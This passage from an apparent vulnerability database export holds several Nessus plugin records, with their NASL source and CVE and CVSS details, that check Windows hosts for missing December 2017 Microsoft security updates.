CVE-2017-11912,\n CVE-2017-11930)\n\n - An information disclosure vulnerability exists when\n Internet Explorer improperly handles objects in memory.\n An attacker who successfully exploited the vulnerability\n could obtain information to further compromise the users\n system. (CVE-2017-11887, CVE-2017-11906)\n\n - An information disclosure vulnerability exists when the\n Windows its:// protocol handler unnecessarily sends\n traffic to a remote site in order to determine the zone\n of a provided URL. This could potentially result in the\n disclosure of sensitive information to a malicious site.\n (CVE-2017-11927)\");\n # https://support.microsoft.com/en-us/help/4054517/windows-10-update-kb4054517\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?3a819f12\");\n script_set_attribute(attribute:\"solution\", value:\n\"Apply security update KB4054517.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:S/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:H/PR:H/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:H/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2017-11885\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2017/12/12\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2017/12/12\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2017/12/12\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:microsoft:windows\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:microsoft:edge\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Windows : Microsoft Bulletins\");\n\n script_copyright(english:\"This script is Copyright (C) 2017-2020 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"smb_check_rollup.nasl\", \"smb_hotfixes.nasl\", \"ms_bulletin_checks_possible.nasl\");\n script_require_keys(\"SMB/MS_Bulletin_Checks/Possible\");\n script_require_ports(139, 445, \"Host/patch_management_checks\");\n\n exit(0);\n}\n\ninclude(\"audit.inc\");\ninclude(\"smb_hotfixes_fcheck.inc\");\ninclude(\"smb_hotfixes.inc\");\ninclude(\"smb_func.inc\");\ninclude(\"misc_func.inc\");\n\nget_kb_item_or_exit(\"SMB/MS_Bulletin_Checks/Possible\");\n\nbulletin = \"MS17-12\";\nkbs = make_list('4054517');\n\nif (get_kb_item(\"Host/patch_management_checks\")) hotfix_check_3rd_party(bulletin:bulletin, kbs:kbs, severity:SECURITY_HOLE);\n\nget_kb_item_or_exit(\"SMB/Registry/Enumerated\");\nget_kb_item_or_exit(\"SMB/WindowsVersion\", exit_code:1);\n\nif (hotfix_check_sp_range(win10:'0') <= 0) audit(AUDIT_OS_SP_NOT_VULN);\n\nshare = hotfix_get_systemdrive(as_share:TRUE, exit_on_fail:TRUE);\nif (!is_accessible_share(share:share)) audit(AUDIT_SHARE_FAIL, share);\n\nif (\n smb_check_rollup(os:\"10\",\n sp:0,\n os_build:\"16299\",\n rollup_date:\"12_2017\",\n bulletin:bulletin,\n rollup_kb_list:[4054517])\n)\n{\n replace_kb_item(name:'SMB/Missing/'+bulletin, value:TRUE);\n hotfix_security_hole();\n hotfix_check_fversion_end();\n exit(0);\n}\nelse\n{\n hotfix_check_fversion_end();\n audit(AUDIT_HOST_NOT, hotfix_get_audit_report());\n}\n", "cvss": {"score": 8.5, "vector": "AV:N/AC:M/Au:S/C:C/I:C/A:C"}}, {"lastseen": "2023-01-11T14:41:31", "description": "The remote Windows host is missing security update 4053581.\nIt is, therefore, affected by multiple vulnerabilities :\n\n - A security feature bypass exists when Device Guard incorrectly validates an untrusted file. An attacker who successfully exploited this vulnerability could make an unsigned file appear to be signed. Because Device Guard relies on the signature to determine the file is non- malicious, Device Guard could then allow a malicious file to execute. In an attack scenario, an attacker could make an untrusted file appear to be a trusted file. The update addresses the vulnerability by correcting how Device Guard handles untrusted files.\n (CVE-2017-11899)\n\n - An information disclosure vulnerability exists when the scripting engine does not properly handle objects in memory in Microsoft browsers. An attacker who successfully exploited the vulnerability could obtain information to further compromise the users system.\n (CVE-2017-11919)\n\n - A remote code execution vulnerability exists in the way that the scripting engine handles objects in memory in Microsoft Edge. The vulnerability could corrupt memory in such a way that an attacker could execute arbitrary code in the context of the current user. An attacker who successfully exploited the vulnerability could gain the same user rights as the current user. (CVE-2017-11889, CVE-2017-11910, CVE-2017-11918)\n\n - A remote code execution vulnerability exists when Microsoft Edge improperly accesses objects in memory.\n The vulnerability could corrupt memory in such a way that enables an attacker to execute arbitrary code in the context of the current user. An attacker who successfully exploited the vulnerability could gain the same user rights as the current user. (CVE-2017-11888)\n\n - A remote code execution vulnerability exists when Internet Explorer improperly accesses objects in memory.\n The vulnerability could corrupt memory in such a way that an attacker could execute arbitrary code in the context of the current user. An attacker who successfully exploited the vulnerability could gain the same user rights as the current user. (CVE-2017-11886, CVE-2017-11890, CVE-2017-11901, CVE-2017-11903, CVE-2017-11907, CVE-2017-11913)\n\n - A remote code execution vulnerability exists in RPC if the server has Routing and Remote Access enabled. An attacker who successfully exploited this vulnerability could execute code on the target system. An attacker could then install programs; view, change, or delete data; or create new accounts with full user rights.\n (CVE-2017-11885)\n\n - A remote code execution vulnerability exists in the way the scripting engine handles objects in memory in Microsoft browsers. The vulnerability could corrupt memory in such a way that an attacker could execute arbitrary code in the context of the current user. An attacker who successfully exploited the vulnerability could gain the same user rights as the current user.\n (CVE-2017-11894, CVE-2017-11895, CVE-2017-11912, CVE-2017-11930)\n\n - An information disclosure vulnerability exists when Internet Explorer improperly handles objects in memory.\n An attacker who successfully exploited the vulnerability could obtain information to further compromise the users system. (CVE-2017-11887, CVE-2017-11906)\n\n - An information disclosure vulnerability exists when the Windows its:// protocol handler unnecessarily sends traffic to a remote site in order to determine the zone of a provided URL. This could potentially result in the disclosure of sensitive information to a malicious site.\n (CVE-2017-11927)", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.0", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2017-12-12T00:00:00", "type": "nessus", "title": "KB4053581: Windows 10 December 2017 Security Update", "bulletinFamily": "scanner", "cvss2": {"severity": "HIGH", "exploitabilityScore": 6.8, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 8.5, "vectorString": "AV:N/AC:M/Au:S/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-11885", "CVE-2017-11886", "CVE-2017-11887", "CVE-2017-11888", "CVE-2017-11889", "CVE-2017-11890", "CVE-2017-11894", "CVE-2017-11895", "CVE-2017-11899", "CVE-2017-11901", "CVE-2017-11903", "CVE-2017-11906", "CVE-2017-11907", "CVE-2017-11910", "CVE-2017-11912", "CVE-2017-11913", "CVE-2017-11918", "CVE-2017-11919", "CVE-2017-11927", "CVE-2017-11930"], "modified": "2020-08-18T00:00:00", "cpe": ["cpe:/o:microsoft:windows", "cpe:/a:microsoft:edge"], "id": "SMB_NT_MS17_DEC_4053581.NASL", "href": "https://www.tenable.com/plugins/nessus/105182", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from the Microsoft Security Updates API. The text\n# itself is copyright (C) Microsoft Corporation.\n#\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(105182);\n script_version(\"1.10\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2020/08/18\");\n\n script_cve_id(\n \"CVE-2017-11885\",\n \"CVE-2017-11886\",\n \"CVE-2017-11887\",\n \"CVE-2017-11888\",\n \"CVE-2017-11889\",\n \"CVE-2017-11890\",\n \"CVE-2017-11894\",\n \"CVE-2017-11895\",\n \"CVE-2017-11899\",\n \"CVE-2017-11901\",\n \"CVE-2017-11903\",\n \"CVE-2017-11906\",\n \"CVE-2017-11907\",\n \"CVE-2017-11910\",\n \"CVE-2017-11912\",\n \"CVE-2017-11913\",\n \"CVE-2017-11918\",\n \"CVE-2017-11919\",\n \"CVE-2017-11927\",\n \"CVE-2017-11930\"\n );\n script_bugtraq_id(\n 102045,\n 102046,\n 102047,\n 102053,\n 102054,\n 102055,\n 102058,\n 102062,\n 102063,\n 102065,\n 102077,\n 102078,\n 102080,\n 102082,\n 102086,\n 102089,\n 102091,\n 102092,\n 102093,\n 102095\n );\n script_xref(name:\"MSKB\", value:\"4053581\");\n script_xref(name:\"MSFT\", value:\"MS17-4053581\");\n\n script_name(english:\"KB4053581: Windows 10 December 2017 Security Update\");\n script_summary(english:\"Checks for rollup.\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote Windows host is affected by multiple vulnerabilities.\");\n script_set_attribute(attribute:\"description\", value:\n\"The remote Windows host is missing security update 4053581.\nIt is, therefore, affected by multiple vulnerabilities :\n\n - A security feature bypass exists when Device Guard\n incorrectly validates an untrusted file. An attacker who\n successfully exploited this vulnerability could make an\n unsigned file appear to be signed. Because Device Guard\n relies on the signature to determine the file is non-\n malicious, Device Guard could then allow a malicious\n file to execute. In an attack scenario, an attacker\n could make an untrusted file appear to be a trusted\n file. The update addresses the vulnerability by\n correcting how Device Guard handles untrusted files.\n (CVE-2017-11899)\n\n - An information disclosure vulnerability exists when the\n scripting engine does not properly handle objects in\n memory in Microsoft browsers. An attacker who\n successfully exploited the vulnerability could obtain\n information to further compromise the users system.\n (CVE-2017-11919)\n\n - A remote code execution vulnerability exists in the way\n that the scripting engine handles objects in memory in\n Microsoft Edge. The vulnerability could corrupt memory\n in such a way that an attacker could execute arbitrary\n code in the context of the current user. An attacker who\n successfully exploited the vulnerability could gain the\n same user rights as the current user. (CVE-2017-11889,\n CVE-2017-11910, CVE-2017-11918)\n\n - A remote code execution vulnerability exists when\n Microsoft Edge improperly accesses objects in memory.\n The vulnerability could corrupt memory in such a way\n that enables an attacker to execute arbitrary code in\n the context of the current user. An attacker who\n successfully exploited the vulnerability could gain the\n same user rights as the current user. (CVE-2017-11888)\n\n - A remote code execution vulnerability exists when\n Internet Explorer improperly accesses objects in memory.\n The vulnerability could corrupt memory in such a way\n that an attacker could execute arbitrary code in the\n context of the current user. An attacker who\n successfully exploited the vulnerability could gain the\n same user rights as the current user. (CVE-2017-11886,\n CVE-2017-11890, CVE-2017-11901, CVE-2017-11903,\n CVE-2017-11907, CVE-2017-11913)\n\n - A remote code execution vulnerability exists in RPC if\n the server has Routing and Remote Access enabled. An\n attacker who successfully exploited this vulnerability\n could execute code on the target system. An attacker\n could then install programs; view, change, or delete\n data; or create new accounts with full user rights.\n (CVE-2017-11885)\n\n - A remote code execution vulnerability exists in the way\n the scripting engine handles objects in memory in\n Microsoft browsers. The vulnerability could corrupt\n memory in such a way that an attacker could execute\n arbitrary code in the context of the current user. An\n attacker who successfully exploited the vulnerability\n could gain the same user rights as the current user.\n (CVE-2017-11894, CVE-2017-11895, CVE-2017-11912,\n CVE-2017-11930)\n\n - An information disclosure vulnerability exists when\n Internet Explorer improperly handles objects in memory.\n An attacker who successfully exploited the vulnerability\n could obtain information to further compromise the users\n system. (CVE-2017-11887, CVE-2017-11906)\n\n - An information disclosure vulnerability exists when the\n Windows its:// protocol handler unnecessarily sends\n traffic to a remote site in order to determine the zone\n of a provided URL. This could potentially result in the\n disclosure of sensitive information to a malicious site.\n (CVE-2017-11927)\");\n # https://support.microsoft.com/en-us/help/4053581/windows-10-update-kb4053581\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?dfb1aa54\");\n script_set_attribute(attribute:\"solution\", value:\n\"Apply security update KB4053581.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:S/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:H/PR:H/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:H/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2017-11885\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2017/12/12\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2017/12/12\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2017/12/12\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:microsoft:windows\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:microsoft:edge\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Windows : Microsoft Bulletins\");\n\n script_copyright(english:\"This script is Copyright (C) 2017-2020 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"smb_check_rollup.nasl\", \"smb_hotfixes.nasl\", \"ms_bulletin_checks_possible.nasl\");\n script_require_keys(\"SMB/MS_Bulletin_Checks/Possible\");\n script_require_ports(139, 445, \"Host/patch_management_checks\");\n\n exit(0);\n}\n\ninclude(\"audit.inc\");\ninclude(\"smb_hotfixes_fcheck.inc\");\ninclude(\"smb_hotfixes.inc\");\ninclude(\"smb_func.inc\");\ninclude(\"misc_func.inc\");\n\nget_kb_item_or_exit(\"SMB/MS_Bulletin_Checks/Possible\");\n\nbulletin = \"MS17-12\";\nkbs = make_list('4053581');\n\nif (get_kb_item(\"Host/patch_management_checks\")) hotfix_check_3rd_party(bulletin:bulletin, kbs:kbs, severity:SECURITY_HOLE);\n\nget_kb_item_or_exit(\"SMB/Registry/Enumerated\");\nget_kb_item_or_exit(\"SMB/WindowsVersion\", exit_code:1);\n\nif (hotfix_check_sp_range(win10:'0') <= 0) audit(AUDIT_OS_SP_NOT_VULN);\n\nshare = hotfix_get_systemdrive(as_share:TRUE, exit_on_fail:TRUE);\nif (!is_accessible_share(share:share)) audit(AUDIT_SHARE_FAIL, share);\n\nif (\n smb_check_rollup(os:\"10\",\n sp:0,\n os_build:\"10240\",\n rollup_date:\"12_2017\",\n bulletin:bulletin,\n rollup_kb_list:[4053581])\n)\n{\n replace_kb_item(name:'SMB/Missing/'+bulletin, value:TRUE);\n hotfix_security_hole();\n hotfix_check_fversion_end();\n exit(0);\n}\nelse\n{\n hotfix_check_fversion_end();\n audit(AUDIT_HOST_NOT, hotfix_get_audit_report());\n}\n", "cvss": {"score": 8.5, "vector": "AV:N/AC:M/Au:S/C:C/I:C/A:C"}}, {"lastseen": "2023-01-11T14:42:20", "description": "The remote Windows host is missing security update 4054521 or cumulative update 4054518. It is, therefore, affected by multiple vulnerabilities :\n\n - An information disclosure vulnerability exists when the scripting engine does not properly handle objects in memory in Microsoft browsers. An attacker who successfully exploited the vulnerability could obtain information to further compromise the users system.\n (CVE-2017-11919)\n\n - A remote code execution vulnerability exists when Internet Explorer improperly accesses objects in memory.\n The vulnerability could corrupt memory in such a way that an attacker could execute arbitrary code in the context of the current user. An attacker who successfully exploited the vulnerability could gain the same user rights as the current user. (CVE-2017-11886, CVE-2017-11890, CVE-2017-11901, CVE-2017-11903, CVE-2017-11907, CVE-2017-11913)\n\n - A remote code execution vulnerability exists in RPC if the server has Routing and Remote Access enabled. An attacker who successfully exploited this vulnerability could execute code on the target system. An attacker could then install programs; view, change, or delete data; or create new accounts with full user rights.\n (CVE-2017-11885)\n\n - A remote code execution vulnerability exists in the way the scripting engine handles objects in memory in Microsoft browsers. The vulnerability could corrupt memory in such a way that an attacker could execute arbitrary code in the context of the current user. An attacker who successfully exploited the vulnerability could gain the same user rights as the current user.\n (CVE-2017-11894, CVE-2017-11895, CVE-2017-11912, CVE-2017-11930)\n\n - An information disclosure vulnerability exists when Internet Explorer improperly handles objects in memory.\n An attacker who successfully exploited the vulnerability could obtain information to further compromise the users system. (CVE-2017-11887, CVE-2017-11906)\n\n - An information disclosure vulnerability exists when the Windows its:// protocol handler unnecessarily sends traffic to a remote site in order to determine the zone of a provided URL. This could potentially result in the disclosure of sensitive information to a malicious site.\n (CVE-2017-11927)", "cvss3": {"exploitabilityScore": 1.6, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "HIGH", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 7.5, "vectorString": "CVSS:3.0/AV:N/AC:H/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.0", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2017-12-12T00:00:00", "type": "nessus", "title": "Windows 7 and Windows Server 2008 R2 December 2017 Security Updates", "bulletinFamily": "scanner", "cvss2": {"severity": "HIGH", "exploitabilityScore": 6.8, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 8.5, "vectorString": "AV:N/AC:M/Au:S/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-11885", "CVE-2017-11886", "CVE-2017-11887", "CVE-2017-11890", "CVE-2017-11894", "CVE-2017-11895", "CVE-2017-11901", "CVE-2017-11903", "CVE-2017-11906", "CVE-2017-11907", "CVE-2017-11912", "CVE-2017-11913", "CVE-2017-11919", "CVE-2017-11927", "CVE-2017-11930"], "modified": "2019-11-12T00:00:00", "cpe": ["cpe:/o:microsoft:windows"], "id": "SMB_NT_MS17_DEC_4054518.NASL", "href": "https://www.tenable.com/plugins/nessus/105184", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from the Microsoft Security Updates API. The text\n# itself is copyright (C) Microsoft Corporation.\n#\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(105184);\n script_version(\"1.10\");\n script_cvs_date(\"Date: 2019/11/12\");\n\n script_cve_id(\n \"CVE-2017-11885\",\n \"CVE-2017-11886\",\n \"CVE-2017-11887\",\n \"CVE-2017-11890\",\n \"CVE-2017-11894\",\n \"CVE-2017-11895\",\n \"CVE-2017-11901\",\n \"CVE-2017-11903\",\n \"CVE-2017-11906\",\n \"CVE-2017-11907\",\n \"CVE-2017-11912\",\n \"CVE-2017-11913\",\n \"CVE-2017-11919\",\n \"CVE-2017-11927\",\n \"CVE-2017-11930\"\n );\n script_bugtraq_id(\n 102045,\n 102046,\n 102047,\n 102053,\n 102054,\n 102055,\n 102058,\n 102062,\n 102063,\n 102078,\n 102082,\n 102091,\n 102092,\n 102093,\n 102095\n );\n script_xref(name:\"MSKB\", value:\"4054521\");\n script_xref(name:\"MSKB\", value:\"4054518\");\n script_xref(name:\"MSFT\", value:\"MS17-4054521\");\n script_xref(name:\"MSFT\", value:\"MS17-4054518\");\n\n script_name(english:\"Windows 7 and Windows Server 2008 R2 December 2017 Security Updates\");\n script_summary(english:\"Checks for rollup.\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote Windows host is affected by multiple vulnerabilities.\");\n script_set_attribute(attribute:\"description\", value:\n\"The remote Windows host is missing security update 4054521\nor cumulative update 4054518. It is, therefore, affected by\nmultiple vulnerabilities :\n\n - An information disclosure vulnerability exists when the\n scripting engine does not properly handle objects in\n memory in Microsoft browsers. An attacker who\n successfully exploited the vulnerability could obtain\n information to further compromise the users system.\n (CVE-2017-11919)\n\n - A remote code execution vulnerability exists when\n Internet Explorer improperly accesses objects in memory.\n The vulnerability could corrupt memory in such a way\n that an attacker could execute arbitrary code in the\n context of the current user. An attacker who\n successfully exploited the vulnerability could gain the\n same user rights as the current user. (CVE-2017-11886,\n CVE-2017-11890, CVE-2017-11901, CVE-2017-11903,\n CVE-2017-11907, CVE-2017-11913)\n\n - A remote code execution vulnerability exists in RPC if\n the server has Routing and Remote Access enabled. An\n attacker who successfully exploited this vulnerability\n could execute code on the target system. An attacker\n could then install programs; view, change, or delete\n data; or create new accounts with full user rights.\n (CVE-2017-11885)\n\n - A remote code execution vulnerability exists in the way\n the scripting engine handles objects in memory in\n Microsoft browsers. The vulnerability could corrupt\n memory in such a way that an attacker could execute\n arbitrary code in the context of the current user. An\n attacker who successfully exploited the vulnerability\n could gain the same user rights as the current user.\n (CVE-2017-11894, CVE-2017-11895, CVE-2017-11912,\n CVE-2017-11930)\n\n - An information disclosure vulnerability exists when\n Internet Explorer improperly handles objects in memory.\n An attacker who successfully exploited the vulnerability\n could obtain information to further compromise the users\n system. (CVE-2017-11887, CVE-2017-11906)\n\n - An information disclosure vulnerability exists when the\n Windows its:// protocol handler unnecessarily sends\n traffic to a remote site in order to determine the zone\n of a provided URL. This could potentially result in the\n disclosure of sensitive information to a malicious site.\n (CVE-2017-11927)\");\n # https://support.microsoft.com/en-us/help/4054521/windows-7-update-kb4054521\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?eb7927f1\");\n # https://support.microsoft.com/en-us/help/4054518/windows-7-update-kb4054518\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?db8ca30f\");\n script_set_attribute(attribute:\"solution\", value:\n\"Apply Security Only update KB4054521 or Cumulative update KB4054518.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:S/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:H/PR:H/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:H/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2017-11885\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2017/12/12\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2017/12/12\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2017/12/12\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:microsoft:windows\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Windows : Microsoft Bulletins\");\n\n script_copyright(english:\"This script is Copyright (C) 2017-2019 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"smb_check_rollup.nasl\", \"smb_hotfixes.nasl\", \"ms_bulletin_checks_possible.nasl\");\n script_require_keys(\"SMB/MS_Bulletin_Checks/Possible\");\n script_require_ports(139, 445, \"Host/patch_management_checks\");\n\n exit(0);\n}\n\ninclude(\"audit.inc\");\ninclude(\"smb_hotfixes_fcheck.inc\");\ninclude(\"smb_hotfixes.inc\");\ninclude(\"smb_func.inc\");\ninclude(\"misc_func.inc\");\n\nget_kb_item_or_exit(\"SMB/MS_Bulletin_Checks/Possible\");\n\nbulletin = \"MS17-12\";\nkbs = make_list('4054521', '4054518');\n\nif (get_kb_item(\"Host/patch_management_checks\")) hotfix_check_3rd_party(bulletin:bulletin, kbs:kbs, severity:SECURITY_HOLE);\n\nget_kb_item_or_exit(\"SMB/Registry/Enumerated\");\nget_kb_item_or_exit(\"SMB/WindowsVersion\", exit_code:1);\n\nif (hotfix_check_sp_range(win7:'1') <= 0) audit(AUDIT_OS_SP_NOT_VULN);\n\nshare = hotfix_get_systemdrive(as_share:TRUE, exit_on_fail:TRUE);\nif (!is_accessible_share(share:share)) audit(AUDIT_SHARE_FAIL, share);\n\nif (\n smb_check_rollup(os:\"6.1\",\n sp:1,\n rollup_date:\"12_2017\",\n bulletin:bulletin,\n rollup_kb_list:[4054521, 4054518])\n)\n{\n replace_kb_item(name:'SMB/Missing/'+bulletin, value:TRUE);\n hotfix_security_hole();\n hotfix_check_fversion_end();\n exit(0);\n}\nelse\n{\n hotfix_check_fversion_end();\n audit(AUDIT_HOST_NOT, hotfix_get_audit_report());\n}\n", "cvss": {"score": 8.5, "vector": "AV:N/AC:M/Au:S/C:C/I:C/A:C"}}, {"lastseen": "2023-01-11T14:41:31", "description": "The remote Windows host is missing security update 4054522 or cumulative update 4054519. It is, therefore, affected by multiple vulnerabilities :\n\n - An information disclosure vulnerability exists when the scripting engine does not properly handle objects in memory in Microsoft browsers. An attacker who successfully exploited the vulnerability could obtain information to further compromise the users system.\n (CVE-2017-11919)\n\n - A remote code execution vulnerability exists when Internet Explorer improperly accesses objects in memory.\n The vulnerability could corrupt memory in such a way that an attacker could execute arbitrary code in the context of the current user. An attacker who successfully exploited the vulnerability could gain the same user rights as the current user. (CVE-2017-11886, CVE-2017-11890, CVE-2017-11901, CVE-2017-11903, CVE-2017-11907, CVE-2017-11913)\n\n - A remote code execution vulnerability exists in RPC if the server has Routing and Remote Access enabled. An attacker who successfully exploited this vulnerability could execute code on the target system. An attacker could then install programs; view, change, or delete data; or create new accounts with full user rights.\n (CVE-2017-11885)\n\n - A remote code execution vulnerability exists in the way the scripting engine handles objects in memory in Microsoft browsers. The vulnerability could corrupt memory in such a way that an attacker could execute arbitrary code in the context of the current user. An attacker who successfully exploited the vulnerability could gain the same user rights as the current user.\n (CVE-2017-11894, CVE-2017-11895, CVE-2017-11912, CVE-2017-11930)\n\n - An information disclosure vulnerability exists when Internet Explorer improperly handles objects in memory.\n An attacker who successfully exploited the vulnerability could obtain information to further compromise the users system. (CVE-2017-11887, CVE-2017-11906)\n\n - An information disclosure vulnerability exists when the Windows its:// protocol handler unnecessarily sends traffic to a remote site in order to determine the zone of a provided URL. This could potentially result in the disclosure of sensitive information to a malicious site.\n (CVE-2017-11927)", "cvss3": {"exploitabilityScore": 1.6, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "HIGH", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 7.5, "vectorString": "CVSS:3.0/AV:N/AC:H/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.0", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2017-12-12T00:00:00", "type": "nessus", "title": "Windows 8.1 and Windows Server 2012 R2 December 2017 Security Updates", "bulletinFamily": "scanner", "cvss2": {"severity": "HIGH", "exploitabilityScore": 6.8, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 8.5, "vectorString": "AV:N/AC:M/Au:S/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-11885", "CVE-2017-11886", "CVE-2017-11887", "CVE-2017-11890", "CVE-2017-11894", "CVE-2017-11895", "CVE-2017-11901", "CVE-2017-11903", "CVE-2017-11906", "CVE-2017-11907", "CVE-2017-11912", "CVE-2017-11913", "CVE-2017-11919", "CVE-2017-11927", "CVE-2017-11930"], "modified": "2019-11-12T00:00:00", "cpe": ["cpe:/o:microsoft:windows"], "id": "SMB_NT_MS17_DEC_4054519.NASL", "href": "https://www.tenable.com/plugins/nessus/105185", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from the Microsoft Security Updates API. The text\n# itself is copyright (C) Microsoft Corporation.\n#\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(105185);\n script_version(\"1.10\");\n script_cvs_date(\"Date: 2019/11/12\");\n\n script_cve_id(\n \"CVE-2017-11885\",\n \"CVE-2017-11886\",\n \"CVE-2017-11887\",\n \"CVE-2017-11890\",\n \"CVE-2017-11894\",\n \"CVE-2017-11895\",\n \"CVE-2017-11901\",\n \"CVE-2017-11903\",\n \"CVE-2017-11906\",\n \"CVE-2017-11907\",\n \"CVE-2017-11912\",\n \"CVE-2017-11913\",\n \"CVE-2017-11919\",\n \"CVE-2017-11927\",\n \"CVE-2017-11930\"\n );\n script_bugtraq_id(\n 102045,\n 102046,\n 102047,\n 102053,\n 102054,\n 102055,\n 102058,\n 102062,\n 102063,\n 102078,\n 102082,\n 102091,\n 102092,\n 102093,\n 102095\n );\n script_xref(name:\"MSKB\", value:\"4054522\");\n script_xref(name:\"MSKB\", value:\"4054519\");\n script_xref(name:\"MSFT\", 